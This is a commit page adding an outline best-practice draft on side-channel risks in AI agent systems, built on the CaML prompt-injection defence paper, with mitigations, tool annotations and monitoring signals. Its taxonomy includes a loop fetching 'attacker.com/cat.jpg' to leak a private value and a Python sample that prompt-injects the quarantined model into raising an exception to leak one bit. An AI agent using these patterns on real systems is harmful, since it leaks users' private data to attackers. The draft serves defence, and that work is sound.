feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables), CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new. The new page merges AI intake (paste URL/text → Haiku generates multiple proposals auto-linked to gaps) with manual form entry. Generated proposals are clickable cards that fill the editor below for refinement. Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes CaML-inspired draft proposals from arXiv:2503.18813 analysis. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
@@ -0,0 +1,245 @@
|
||||
---
|
||||
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
|
||||
draft_name: draft-nennemann-ai-agent-side-channels-00
|
||||
intended_wg: SECDISPATCH (BCP)
|
||||
status: outline
|
||||
gaps_addressed: [89, 93]
|
||||
camel_sections: [7]
|
||||
document_type: BCP (Best Current Practice)
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Side-Channel Mitigation Framework for AI Agent Interactions
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:
|
||||
|
||||
1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
|
||||
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
|
||||
3. **Timing side-channels**: an adversary infers private values from execution timing differences
|
||||
|
||||
These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.
|
||||
|
||||
This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document provides:
|
||||
|
||||
1. A **taxonomy of side-channel risks** specific to AI agent systems
|
||||
2. **Mitigation strategies** for each risk category
|
||||
3. **Tool API design guidelines** that minimize side-channel exposure
|
||||
4. **Monitoring patterns** for detecting side-channel exploitation
|
||||
5. **STRICT vs. NORMAL mode** recommendations
|
||||
|
||||
## 3. Side-Channel Taxonomy
|
||||
|
||||
### 3.1 External Resource Inference
|
||||
|
||||
**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.
|
||||
|
||||
**CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var` and policies can block it.
|
||||
|
||||
**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).
|
||||
|
||||
```
|
||||
Attacker's Server
|
||||
│
|
||||
│ GET /cat.jpg ×10 ← private_var = 10
|
||||
│ GET /cat.jpg ×20 ← private_var = 20
|
||||
│
|
||||
└── attacker infers private_var by counting requests
|
||||
```
|
||||
|
||||
### 3.2 Exception-Based Bit Leaking
|
||||
|
||||
**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.
|
||||
|
||||
**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).
|
||||
|
||||
```python
|
||||
# Attack: leak whether private_var == 10
|
||||
index = query_ai_assistant(
|
||||
f"If '{private_var}' is 10, return 9999999, else 0", int)
|
||||
l = [1, 2, 3]
|
||||
l[index] # IndexError if private_var == 10
|
||||
# ADVERSARY OBSERVABLE ACTION below:
|
||||
send_email(...) # only executes if no exception
|
||||
```
|
||||
|
||||
**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).
|
||||
|
||||
### 3.3 Timing Side-Channels
|
||||
|
||||
**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.
|
||||
|
||||
**CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.
|
||||
|
||||
**Bandwidth**: depends on timing precision — generally low but non-zero.
|
||||
|
||||
### 3.4 Agent-Specific Side Channels (Beyond CaML)
|
||||
|
||||
| Channel | Attack Vector | Bandwidth |
|
||||
|---------|--------------|-----------|
|
||||
| **Token usage** | Private data influences response length → observable token count | Medium |
|
||||
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
|
||||
| **Error message content** | Error details leak through supposedly sanitized channels | High |
|
||||
| **Model confidence** | Probability distributions in structured output leak information | Low |
|
||||
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |
|
||||
|
||||
## 4. Mitigation Strategies
|
||||
|
||||
### 4.1 STRICT Mode Execution
|
||||
|
||||
**Recommendation: Use STRICT mode for all security-sensitive agent operations.**
|
||||
|
||||
In STRICT mode:
|
||||
|
||||
- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
|
||||
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
|
||||
- Security policies can detect and block the side-channel
|
||||
|
||||
**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.
|
||||
|
||||
### 4.2 Exception Handling Hardening
|
||||
|
||||
**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**
|
||||
|
||||
Exceptions create side channels because they halt execution. Instead:
|
||||
|
||||
```python
|
||||
# VULNERABLE: exception leaks information
|
||||
try:
|
||||
result = risky_operation(private_data)
|
||||
send_email(result) # not reached if exception
|
||||
except:
|
||||
pass # attacker observes: was email sent?
|
||||
|
||||
# MITIGATED: error-value preserves execution flow
|
||||
result = risky_operation(private_data) # returns Result type
|
||||
if result.is_ok():
|
||||
send_email(result.value) # both branches execute deterministically
|
||||
else:
|
||||
send_email(default_value) # same tool call either way
|
||||
```
|
||||
|
||||
Agent frameworks SHOULD:
|
||||
- Use `Result`/`Either` types instead of exceptions for Processor outputs
|
||||
- Ensure both success and failure paths make the same external observations
|
||||
- Redact exception messages before they reach the Planner
|
||||
|
||||
### 4.3 Constant-Pattern Tool Calls
|
||||
|
||||
**Recommendation: Where feasible, make tool call patterns independent of private data.**
|
||||
|
||||
- Avoid data-dependent loops that make external calls
|
||||
- Use batch operations instead of per-item calls
|
||||
- Pad tool call sequences to fixed lengths for sensitive operations
|
||||
|
||||
### 4.4 External Request Restrictions
|
||||
|
||||
**Recommendation: Restrict which external endpoints agents can contact.**
|
||||
|
||||
- Allowlist approved external domains
|
||||
- Proxy all external requests through a controlled gateway
|
||||
- Rate-limit external requests per agent session
|
||||
- Log all external requests for anomaly detection
|
||||
|
||||
## 5. Tool API Design Guidelines
|
||||
|
||||
Tool developers SHOULD design APIs that minimize side-channel exposure:
|
||||
|
||||
### 5.1 Do
|
||||
|
||||
- Return consistent response structures regardless of input
|
||||
- Use fixed-size responses where possible
|
||||
- Include provenance metadata in all outputs
|
||||
- Document trust levels of output fields (which are public, which are private)
|
||||
|
||||
### 5.2 Don't
|
||||
|
||||
- Return variable-length arrays that depend on private data in observable ways
|
||||
- Include internal identifiers in error messages
|
||||
- Use response timing that depends on input sensitivity
|
||||
- Expose iteration counts or batch sizes in responses
|
||||
|
||||
### 5.3 Tool Capability Annotations
|
||||
|
||||
Tools SHOULD declare their side-channel properties:
|
||||
|
||||
```json
|
||||
{
|
||||
"tool:name": "send_email",
|
||||
"tool:side_channel_properties": {
|
||||
"makes_external_requests": true,
|
||||
"timing_dependent": false,
|
||||
"error_messages_may_leak": true,
|
||||
"observable_by_third_parties": true
|
||||
},
|
||||
"tool:recommended_mode": "STRICT"
|
||||
}
|
||||
```
|
||||
|
||||
## 6. Monitoring Patterns
|
||||
|
||||
### 6.1 Anomaly Detection Signals
|
||||
|
||||
| Signal | Potential Attack | Action |
|
||||
|--------|-----------------|--------|
|
||||
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
|
||||
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
|
||||
| Execution time variance > threshold | Timing side-channel | Log + investigate |
|
||||
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
|
||||
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
|
||||
|
||||
### 6.2 Monitoring Architecture
|
||||
|
||||
```
|
||||
Agent Execution
|
||||
│
|
||||
├──► Side-Channel Monitor
|
||||
│ ├── Request pattern analyzer
|
||||
│ ├── Exception rate tracker
|
||||
│ ├── Timing variance detector
|
||||
│ └── Tool call pattern validator
|
||||
│ │
|
||||
│ ▼
|
||||
│ Alert / Halt Decision
|
||||
│
|
||||
▼
|
||||
Normal execution continues (if no anomaly)
|
||||
```
|
||||
|
||||
## 7. Relationship to Other Drafts
|
||||
|
||||
| Draft | Side-Channel Relevance |
|
||||
|-------|----------------------|
|
||||
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
|
||||
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
|
||||
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
|
||||
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
|
||||
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |
|
||||
|
||||
## 8. Security Considerations
|
||||
|
||||
This entire document is about security. Key meta-considerations:
|
||||
|
||||
- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
|
||||
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
|
||||
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
|
||||
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)
|
||||
|
||||
## 9. Open Questions
|
||||
|
||||
1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
|
||||
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead?
|
||||
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
|
||||
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)?
|
||||
|
||||
## 10. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
|
||||
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
|
||||
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.
|
||||
Reference in New Issue
Block a user